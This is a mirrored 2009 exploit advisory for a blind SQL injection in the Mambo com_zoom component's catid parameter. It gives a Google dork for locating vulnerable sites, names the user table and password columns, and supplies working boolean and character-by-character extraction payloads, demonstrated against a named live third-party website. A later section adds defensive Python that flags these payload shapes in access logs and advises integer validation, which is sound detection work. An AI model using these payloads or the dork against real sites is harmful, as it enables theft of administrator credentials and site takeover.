Mambo component com_zoom (catid) Blind SQL injection

CVE: N/A
Category: CWE-89
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2009-09-11
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009090012

Below is a copy:

  Mambo component com_zoom (catid) Blind SQL injection 

      Red n'black I dress, eagle on my chest. 
      It's good to be an ALBANIAN. Keep my head up high, for that flag I die. 
      I'm proud to be an ALBANIAN
   ######    
              
       Author         : boom3rang
       Contact        : boom3rang[at]live.com                          
       Greetz   : H!tm@N - KHG - cHs

  R.I.P redc00de          
   -------------------------------------------------------------------    
              
                  Affected software description                      
             <name>zoom</name>
             <creationDate>20/01/2004</creationDate>
             <author>Mike de Boer</author>
             <authorEmail>[email protected]</authorEmail>
             <authorUrl>www.mikedeboer.nl</authorUrl>
             <version>2.0</version>          
   -------------------------------------------------------------------    
              
    [~] SQLi :                  
              
    http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]           
                                                                 
    [~]Google Dork :                     
    
    inurl:com_zoom inurl:"imgid"    
              
   -------------------------------------------------------------------    
              
    [~] Table_NAME  =  mos_users
    [~] Column_NAME =  username - password                             
   -------------------------------------------------------------------    
              
    [~] Admin Path :                  
              
    http://www.TARGET.com/administrator

   === POC ===

        
    [~] Live Demo:
    ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/*    --> True
   ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/*    --> False

   -------------------------------------------------------------------

    [~] ASCII 
   index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

   -------------------------------------------------------------------
    
    [~] Live Demo ASCII

      True
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96
      
      False
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97

   As we see, the first character of username is 'a': char(97)=a
   Now you can change the second limit to find other characters. Good Luck...
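
A defender-side check for the request shape this advisory describes, as an added example that is not part of the original advisory or of the com_zoom code: it scans web access logs for com_zoom requests whose catid is not a plain integer and labels the payload shapes shown above. The log lines, client addresses and response sizes are constructed, and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [11/Sep/2009:10:00:01 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21 HTTP/1.1" 200 5120
203.0.113.9 - - [11/Sep/2009:10:00:05 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* HTTP/1.1" 200 5120
203.0.113.9 - - [11/Sep/2009:10:00:06 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21%2F**%2Fand%2F**%2F1%3D2%2F* HTTP/1.1" 200 812
203.0.113.9 - - [11/Sep/2009:10:00:09 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users%20limit%200,1),1,1))%3E96 HTTP/1.1" 200 5120
198.51.100.7 - - [11/Sep/2009:10:00:12 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 900
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) (\d+)')
HINTS = {  # payload shapes shown in the advisory
    "sql-comment": re.compile(r"/\*"),
    "boolean-test": re.compile(r"\b(?:and|or)\b.{0,20}?\d+\s*=\s*\d+", re.I),
    "char-extraction": re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substring|substr|mid)\s*\(", re.I),
    "subselect": re.compile(r"\bselect\b.+\bfrom\b", re.I),
}

def flag_requests(log_text):
    """Return (client, catid, reasons, size) for com_zoom hits with a non-numeric catid."""
    flagged = []
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        client, target, _status, size = m.groups()
        # parse_qs percent-decodes, so encoded and raw payloads are matched alike
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if params.get("option", [""])[0] != "com_zoom":
            continue
        for catid in params.get("catid", []):
            if re.fullmatch(r"[0-9]+", catid):
                continue  # the only shape a category id should have
            reasons = [name for name, rx in HINTS.items() if rx.search(catid)]
            flagged.append((client, catid, reasons or ["non-numeric"], int(size)))
    return flagged

def probing_clients(flagged, min_hits=2):
    """Clients with repeated flagged requests and the distinct response sizes they got."""
    seen = defaultdict(list)
    for client, _catid, _reasons, size in flagged:
        seen[client].append(size)
    return {c: sorted(set(s)) for c, s in seen.items() if len(s) >= min_hits}

if __name__ == "__main__":
    hits = flag_requests(SAMPLE_LOG)
    print(*hits, probing_clients(hits), sep="\n")
```

The same integer-only rule is the fix on the application side: a catid that is cast to or validated as an integer before it reaches the query leaves nothing for the payloads above to ride on.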




